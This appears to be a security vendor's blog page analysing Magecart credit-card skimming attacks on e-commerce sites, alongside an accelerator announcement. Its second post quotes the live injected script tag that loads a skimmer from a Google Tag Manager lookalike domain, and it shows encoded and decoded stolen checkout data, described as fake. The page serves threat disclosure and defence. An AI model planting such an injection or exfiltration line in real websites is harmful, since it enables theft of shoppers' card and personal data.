Category:

We are happy to announce we have been selected to be part of the Citi Accelerator Class 9 program

March 6, 2019 in Announcements

We are happy to announce we have been selected to be part of the Citi Accelerator Class 9 program. To learn more: ps://www.linkedin.com/pulse/meet-citi-accelerator-class-9-rachel-fabian-edelman/

About Citi Accelerator:

Citi Accelerator offers Fintech, Data Analytics, AI, Cyber Security and Enterprise startups the opportunity to gain unique access to Citi worldwide as well as to its network.

The program is geared on building a thriving ecosystem and as such the program is free of charge; we do not take equity or commit to invest in the companies.

Data Breach. A Real World Example

January 20, 2019 in Data Breach, Magecart

We put a lot of thought into our data breach detection engine, a powerful real-time production monitoring solution comprised of 3 main layers, a combination of human intelligence logic and our AI anomaly detection, arming us with the tools needed to detect the old threats and prepare for future attacks.

Last month our team discovered dozens of sites with live credit card skimmers, which we identified as Magecart activity, including one of the largest consumer electronics retailers in the UK and a well-known sports apparel brand from France. We’ve alerted the relevant CISOs who immediately acted to secure customers information.

As a result, we now have new clients and grew our bank of authentic attacks, from which I’m going to share an example:

To demonstrate the malicious activity flow, we will walk through a live example of one of the data breaches identified by our external monitoring solution, Intelligence Pro, to protect our clients’ privacy, we will not share their identity, and site information will not be disclosed.

To simplify this blog post, I also won’t delve into how the malicious JavaScript was injected in the first place, and will just point out that this is not a difficult process considering 1st and 3rd party vulnerabilities on the client-side.

The malware is locally embedded in all known pages of the site at the end of the page via the following JavaScript snippet:  <script src=”https://googletagmanager.eu/gtm.js”></script> a Google Tag Manager lookalike domain googletagmanager.eu instead of the original googletagmanager.com

This script tag loads a remote script which is a generic eCommerce credit card skimming malware, that belongs to the Magecart group of attacks. The script contains the full malicious code which steals the following data to the attacker’s server:

  • Credit card number, expiration date, CVV code
  • Full name
  • Billing address
  • Shipping address

This malware is a known card skimmer operating from a malicious server located at hxxps://googletagmanager.eu  with hxxps://googletagmanager.eu/gtm.js injecting the eCommerce credit card skimming malware. Following the collection of the compromised data, it sends the user’s private information and credit card details via hxxps://www.googletagmanager.eu/ga.js. As seen in the image below:

To hide the information leakage, a simple encoding encryption was performed on the stolen data, a common obfuscation method very simple to revert:

Original Skimming Form Data:

bnVsbGJpbGxpbmdfYWRkcmVzc19pZD0xMjYwOCZiaWxsaW5nW2FkZHJlc3NfaWRdPTI2Mjc2MiZiaWxsaW5nW2ZpcnN0bmFtZV09QWx2aW4mYmlsbGluZ1tsYXN0bmFtZV09TmVhbCZiaWxsaW5nW3RheHZhdF09NzQzLjU5OS4zMjAtNDkmYmlsbGluZ1t0ZWxlcGhvbmVdPSg0NTcpIDMwOS0yNTkxJmJpbGxpbmdbcG9zdGNvZGVdPTIxMzIxLTEyMyZiaWxsaW5nW3N0cmVldF1bXT1OaWZvayBHbG4mYmlsbGluZ1tzdHJlZXRdW109MTI0NSAmYmlsbGluZ1tzdHJlZXRdW109Tmlmb2sgR2xuJmJpbGxpbmdbc3RyZWV0XVtdPTEyNDUmYmlsbGluZ1tjaXR5XT1SaW8mYmlsbGluZ1tyZWdpb25faWRdPTQ4OSZiaWxsaW5nW2NvdW50cnlfaWRdPUJSJmJpbGxpbmdbc2F2ZV9pbl9hZGRyZXNzX2Jvb2tdPTEmYmlsbGluZ1t1c2VfZm9yX3NoaXBwaW5nXT0xJnNoaXBwaW5nX2FkZHJlc3NfaWQ9MTI2MDgmc2hpcHBpbmdbYWRkcmVzc19pZF09MjYyNzYzJnNoaXBwaW5nW2ZpcnN0bmFtZV09QWx2aW4mc2hpcHBpbmdbbGFzdG5hbWVdPU5lYWwmc2hpcHBpbmdbdGVsZXBob25lXT0oNDU3KSAzMDktMjU5MSZzaGlwcGluZ1twb3N0Y29kZV09MjEzMjEtMTIzJnNoaXBwaW5nW3N0cmVldF1bXT1OaWZvayBHbG4mc2hpcHBpbmdbc3RyZWV0XVtdPTEyNDUgJnNoaXBwaW5nW3N0cmVldF1bXT1OaWZvayBHbG4mc2hpcHBpbmdbc3RyZWV0XVtdPTEyNDUmc2hpcHBpbmdbY2l0eV09UmlvJnNoaXBwaW5nW3JlZ2lvbl9pZF09NDg5JnNoaXBwaW5nW2NvdW50cnlfaWRdPUJSJnNoaXBwaW5nW3NhdmVfaW5fYWRkcmVzc19ib29rXT0xJnNoaXBwaW5nW3NhbWVfYXNfYmlsbGluZ109MSZzaGlwcGluZ19tZXRob2Q9bXBfbXVsdGlfc2hpcHBpbmdfbXBfbXVsdGlfc2hpcHBpbmcmc2VsZWN0ZWRfc2hpcHBpbmdbMTE1NV1baXRlbXNdPTE1Njk2OSZmb3JtX2tleT01eUZ5UExxanBnRUZKOTlHJnBheW1lbnRbbWV0aG9kXT1tZXJjYWRvcGFnb19jdXN0b20mPUFwbGljYXImcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW3BheW1lbnRNZXRob2RTZWxlY3Rvcl09LTEmPTQxMTExMTExMTExMTExMTEmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2NhcmRFeHBpcmF0aW9uTW9udGhdPTQmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2NhcmRFeHBpcmF0aW9uWWVhcl09MjAyMyZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bY2FyZGhvbGRlck5hbWVdPUFsdmluIE5lYWwmPTY1NCZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bZG9jVHlwZV09Q1BGJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVtkb2NOdW1iZXJdPTcyNTM1NTM0NjIyJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVtpc3N1ZXJfaWRdPS0xJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVtpbnN0YWxsbWVudHNdPTEmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW3NpdGVfaWRdPU1MQiZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bYW1vdW50XT05MiZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bdG90YWxfYW1vdW50XT05MiZwYXltZW50W21lcmNhZG9wYWdvX2N1c3RvbV1bcGF5bWVudE1ldGhvZElkXT12aXNhJnBheW1lbnRbbWVyY2Fkb3BhZ29fY3VzdG9tXVt0b2tlbl09ZjRjZTE0YWI5ZDgzNDA0ZDkzYWRmZDg0YWY2YTBiNzkmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2NhcmRUcnVuY2F0ZWRdPTQxMTEgMTEqKiAqKioqIDExMTEmcGF5bWVudFttZXJjYWRvcGFnb19jdXN0b21dW2N1c3RvbWVyX2lkXT0zOTU5MjM3MzQtUnlGbmhFYmxqazh5YnUmZm9ybV9rZXk9NXlGeVBMcWpwZ0VGSjk5RyY=

Decoded Skimming Form Data: With all the user private information entered during the purchase flow, including the credit card (all the information entered is random/fake)

nullbilling_address_id=12608&billing[address_id]=262762&billing[firstname]=Alvin&billing[lastname]=Neal&billing[taxvat]=743.599.320-49&billing[telephone]=(457) 309-2591&billing[postcode]=21321-123&billing[street][]=Nifok Gln&billing[street][]=1245 &billing[street][]=Nifok Gln&billing[street][]=1245&billing[city]=Rio&billing[region_id]=489&billing[country_id]=BR&billing[save_in_address_book]=1&billing[use_for_shipping]=1&shipping_address_id=12608&shipping[address_id]=262763&shipping[firstname]=Alvin&shipping[lastname]=Neal&shipping[telephone]=(457) 309-2591&shipping[postcode]=21321-123&shipping[street][]=Nifok Gln&shipping[street][]=1245 &shipping[street][]=Nifok Gln&shipping[street][]=1245&shipping[city]=Rio&shipping[region_id]=489&shipping[country_id]=BR&shipping[save_in_address_book]=1&shipping[same_as_billing]=1&shipping_method=mp_multi_shipping_mp_multi_shipping&selected_shipping[1155][items]=156969&form_key=5yFyPLqjpgEFJ99G&payment[method]=mercadopago_custom&=Aplicar&payment[mercadopago_custom][paymentMethodSelector]=-1&=4111111111111111&payment[mercadopago_custom][cardExpirationMonth]=4&payment[mercadopago_custom][cardExpirationYear]=2023&payment[mercadopago_custom][cardholderName]=Alvin Neal&=654&payment[mercadopago_custom][docType]=CPF&payment[mercadopago_custom][docNumber]=72535534622&payment[mercadopago_custom][issuer_id]=-1&payment[mercadopago_custom][installments]=1&payment[mercadopago_custom][site_id]=MLB&payment[mercadopago_custom][amount]=92&payment[mercadopago_custom][total_amount]=92&payment[mercadopago_custom][paymentMethodId]=visa&payment[mercadopago_custom][token]=f4ce14ab9d83404d93adfd84af6a0b79&payment[mercadopago_custom][cardTruncated]=4111 11** **** 1111&payment[mercadopago_custom][customer_id]=395923734-RyFnhEbljk8ybu&form_key=5yFyPLqjpgEFJ99G&

ChameleonX Intelligence Pro detected this data breach immediately with the activation of the external site scan. While this is quite a simple form of attack, it is unknown how long is has been active prior to our detection.

Detection time is a critical factor, with similar Magecart attacks making the news globally including large brands such as British Airways, Ticketmaster and Newegg, the time to detection is a 30 – 45 days on average.

In today’s web business environment, relying on 3rd party services to help businesses grow, supply chain attacks are quite impossible to prevent, with no control over vendors security protocols or obligation to customer privacy. This makes the detection time a crucial factor for the implications of a data breach

Dissecting a Magecart Operation

December 28, 2018 in Data Breach, Magecart

t ChameleonX we deal with many cases of client-side data breach attacks, carried out seamlessly by fraudsters. These client-side fraudulent endeavors are triggered by a simple single-line script tag embedded to the body of the website, in pages where sensitive information resides.

Compromised Customer Credit Cards, Worldwide

A few days ago, our research led us to discover 11 different Magento e-commerce websites, from all around the world, that currently have live credit card skimmers embedded in them. The attacks are rather similar to one another and apparently belong to the same notorious Magecart group: sharing C2 servers and reused code.

Some of the websites in the list have monthly traffic of 100K-300K unique visitors (One of them an Amazon Best-Selling company), and belong to SMB/Mid market companies of dozens to hundreds of employees. We will not uncover the names of these companies due to obvious reasons, but you can rest assured we contacted all of them and most have already removed the credit card skimming malware.

our research led us to discover 11 different e-commerce websites, from all around the world, that currently have live credit card skimmers embedded in them.

Estimated monthly visits of an infected e-commerce site (stats by SimilarWeb.com)

Data Exfiltration with a Disguise

The operation we discuss in this post, uses lookalike domains for the C2 servers, in order to maintain a low footprint and evade detection by website owners and users. The analyzed attacks used domains camouflaged as services such as:

  • Google Analytics
  • Google Tag Manager
  • Bootstrap
  • React


Exfiltrated credit card data from a large e-commerce website, infected with a Magecart card skimmer, sent to the fraudster’s C2 server

Card skimmer Javascript code

You get the picture.. Imagine inspecting your website’s network traffic and seeing an outgoing request with a domain like googletagmaanager.com – if you’re not actively looking for a threat, you’d probably assume it’s just a legit request from your GTM library right?

The C2 Endpoint

Once the compromised e-commerce websites have been identified, we started to look into the C2 servers themselves, to see what intelligence we could get our hands on. The C2 server is where attackers fetch the remote Javascript injection from and the place they report back with the stolen data (victim’s personal details, credentials, credit card data and more).

One of the core principals of research is persistence. You need to be committed to what you do and analyze many different attacks until the answer is found. Following many attempts, researchers at ChameleonX have managed to gain access to the shell PHP script used by Magecart fraudsters for remote code execution and modification of website resources such as Javascript libraries and HTML files.

Real Magecart Webshell backdoor script obtained from a C2 server


An illustration of a code injection attack flow

Attackers leverage different vulnerabilities to exploit websites with this shell. After deploying it to the exploited website and obtaining the remote access URL, fraudsters are basically able to control most aspects of the server, allowing them to inject malicious code to client-side runtime, modifying the site that is served to end users.


ChameleonX is a cybersecurity startup company, developing a unique AI-based client-side protection solution for the eCommerce, Travel and Financial sectors to protect businesses from zero-day attacks, compromised 3rd-party resources, web vulnerabilities and malware code injections. Learn more about how we can protect your company from becoming the next big data breach news story.